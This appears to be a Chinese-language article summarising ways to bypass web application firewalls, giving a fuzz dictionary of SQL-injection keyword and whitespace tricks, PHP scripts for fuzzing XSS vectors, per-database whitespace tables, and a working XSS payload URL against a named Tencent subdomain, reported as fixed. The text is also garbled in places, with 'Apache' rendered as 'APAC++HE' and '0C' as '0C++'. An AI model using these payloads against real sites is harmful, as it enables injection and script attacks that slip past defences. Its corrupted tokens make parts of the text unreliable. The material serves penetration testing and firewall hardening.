WAF绕过的一些总结和思考

WAF绕过的一些总结和思考

WAF分类： 1.网络层类 2.最常见且容易部署的应用层类 （部署在APAC++HE之前，APAC++HE之后） 应用层WAF – 利用WAF自身缺陷和MYSQL语法特性并结合实际绕过： WAF最常见检测方式：关键词检测 例如 如果出现 [空格]union[空格] 这样的SQL语句则视为恶意请求，丢弃这个数据包，XSS代码同理。 常见的绕过类型： 类型1： 数据包 -> WAF（利用string存储请求参数，解码后检测）-> APAC++HE C++语言等利用string等储存结构存储请求，在解码时，%00会成为 NULL 从而截断接下去的请求内容 因此例如 ?id=1%00%20and%201=1 就成为了 ?id=1 从而绕过WAF检测 类型2： 数据包 -> WAF ->APAC++HE 绕过逻辑： WAF对某些User-Agent特殊放行（如百度spider 的UA） WAF对某些POST包特殊放行（文件上传包） 例子：《安全狗某版本bypass》（http://zone.wooyun.org/content/17331） 类型3： 数据包 -> WAF ->APAC++HE 利用mysql的语法特性和html代码的特殊书写方式、浏览器的渲染方式绕过。由于实际渗透测试过程中对WAF的实际检测逻辑并不清楚，所以利用fuzz是最好的方法，这也是WAF最常见的绕过方法。 FUZZ字典： %a0union%a0 (WAF中正则表达式 \s 并不能匹配 %a0 但MYSQL视之为 空格) %0aunion%0a %0bunion%0b (WAF中正则表达式 \s \t 并不能识别匹配 %0b) %09union%09 /**/union/**/ %0dunion%0d /*%e4*/union/*%e4*/(UTF8中的半个中文 正则表达式中任意匹配符(.)不能匹配该内容) `version`() （MYSQL语法特性 函数可以书写成 `函数名`()) /*!union*/ 8E0union (MYSQL语法特性，检测为浮点数后语境结束，视为空格，下2同） 8.0union \Nunion .1union/*.1*/ ... XSS类的一个fuzz实例： 《Fuzz <img src=x [code..] onerror=XSS>来检测 onerror 前可以无缝连接怎样的字符》 编写fuzzz.php 和 fuzz.php 代码如下 Fuzzz.php:  <html> <?php $urlhex=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']; $i=0; $ii=0; for ($i=0; $i < 16 ; $i++) {  for ($ii=0; $ii < 16; $ii++) {  $hex = $urlhex[$i] . $urlhex[$ii]; $realhex = '%' .$urlhex[$i] . $urlhex[$ii]; echo "<iframe src='http://localhost/fuzz.php?c=".$realhex."&d=".$hex."''></iframe>"; } } ?> </html> Fuzz.php: <?php $code = $_GET['c']; $cc = $_GET['d']; ?> <html> <img src=x <?php echo $code?>onerror="alert('<?php echo $cc?>')"> </html> 运行Fuzzz.php 进行自动fuzz,结果为: 0c,0d,2f,0a,20,09 1506031300c24c8e0557b05eb0.jpg 同理可以fuzz出各种标签的其他位置可以插入的特殊字符。 附SQL语句空白符FUZZ结果 （http://zone.wooyun.org/content/15953） SQLite3:0A,0D,0C++,09,20 MySQL5:09,0A,0B,0C++,0D,A0,20 PosgresSQL:0A,0D,0C++,09,20 Oracle_11g:00,0A,0D,0C++,09,20 MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C++,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C++,1D,1E,1F,20 类型4： 数据包 -> WAF ->APAC++HE 这是WAF无法考虑到的… 多次恶意代码检测和处理 留下的隐患： 例子（已修复）： 漏洞名称：crm2.qq.com XSS 提交时间：2015-03-30 13:39:31 “这个时候就遇到了你们的迷之waf，<script>果断501啊，崩溃了半小时，稍微fuzz了一下，发现%0a会无视掉，成功bypass waf” 最后构造的XSS为： http://crm2.qq.com/page/portalpage/wpa.php?uin=40012345&f=5&ty=6666&ap=%23&debug=1&bt=\x3csc%0aript\x3eale%0art() 这里有一个tencent waf ，对XSS代码也有一定的防御检测，在get请求中出现 <script> , alert() , <svg> 等关键词时，触发waf，返回错误码501 但由于参数在经过waf检测后，通过php的 $_GET[] 函数取得，并继续进行关键词过滤，经过笔者的一番fuzz，发现它会匹配换行符 %0a 并丢弃后输出，因此在这个逻辑下： <scri%0apt>aler%0at() 经过waf 时，通过了检测（并没有关键词），然后经过php的字符串处理后，依然输出了恶意代码。 类型5： 数据包 -> WAF ->APAC++HE 畸形HTTP包， 利用Apache对HTTP包的兼容性和WAF对畸形HTTP包的不兼容性绕过WAF 总结： 对于普遍的应用层WAF，fuzz是测试waf的较好的方法，利用MYSQL的一些语法特性和浏览器的一些渲染方式，构造出一份强大的fuzz字典，或许就可以绕过waf的关键词检测。 同时，WAF和php代码的连接灵活性也是很值得考虑的，例如类型4，多次对传入数据进行处理反而容易留下隐患。